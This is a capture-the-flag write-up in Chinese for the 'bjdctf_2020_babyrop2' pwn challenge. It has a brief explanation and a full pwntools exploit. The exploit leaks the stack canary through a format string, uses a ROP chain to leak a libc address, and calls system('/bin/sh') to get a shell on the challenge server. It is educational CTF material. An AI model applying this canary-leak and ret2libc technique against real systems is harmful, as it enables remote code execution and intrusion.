bjdctf_2020_babyrop2

bjdctf_2020_babyrop2_第1张图片
注意这题开启了Canary

bjdctf_2020_babyrop2_第2张图片
因为限制了 payload 长度，所以不能改写 GOT 表；但可以直接泄露 Canary 值，再在 vuln 中进行栈溢出即可拿到 shell。

exp

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'  # log every byte sent/received; helps when the prompts below do not line up
proc_name = './bjdctf_2020_babyrop2'
elf = ELF(proc_name)
p = process(proc_name)  # NOTE(review): this local handle is overwritten on the next line and never closed
p = remote('node3.buuoj.cn', 27936)
main_addr = elf.sym['main']
vuln_addr = elf.sym['vuln']
pop_rdi_ret = 0x400993  # `pop rdi; ret` gadget address, hard-coded for this binary
read_got = elf.got['read']
puts_plt = elf.plt['puts']
# Step 1: answer the first prompt with a format string that prints the 11th stack slot.
# Per the write-up that slot holds the stack canary, which is why the canary alone does
# not stop the later overflow: the disclosure bug defeats it.
p.sendlineafter('u!', b'%11$p')
p.recv()
canary = p.recvuntil('\n')[:-1]  # hex text of the leaked value, trailing newline stripped
log.info(canary)
# Step 2: overflow in vuln() with the leaked canary written back in place, followed by a
# chain that calls puts(read@got) to leak read's libc address, then returns into vuln
# so the same overflow can be used a second time.
# Layout: 0x18 bytes of padding, canary, a dummy saved rbp, then the ROP chain.
payload = b'a' * (0x20 - 8) + p64(int(canary.decode(), 16)) + p64(0) + p64(pop_rdi_ret) + p64(read_got) + p64(puts_plt) + p64(vuln_addr)
p.sendafter('story!', payload)
p.recv()
read_addr = u64(p.recv(6).ljust(0x8, b'\x00'))  # 6 significant bytes of the leaked pointer, zero-extended to 8
log.info(hex(read_addr))
# Step 3: identify the libc build from the leaked read address and derive the
# system and "/bin/sh" addresses from the resulting base.
libc = LibcSearcher('read', read_addr)
libc_base = read_addr - libc.dump('read')
system_addr = libc_base + libc.dump('system')
str_bin_sh = libc_base + libc.dump('str_bin_sh')
# Step 4: same layout as the first payload; the chain now calls system("/bin/sh")
# and returns to main afterwards.
payload1 = b'a' * (0x20 - 8) + p64(int(canary.decode(), 16)) + p64(0) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(main_addr)
p.sendafter('story!', payload1)
p.interactive()

bjdctf_2020_babyrop2_第3张图片
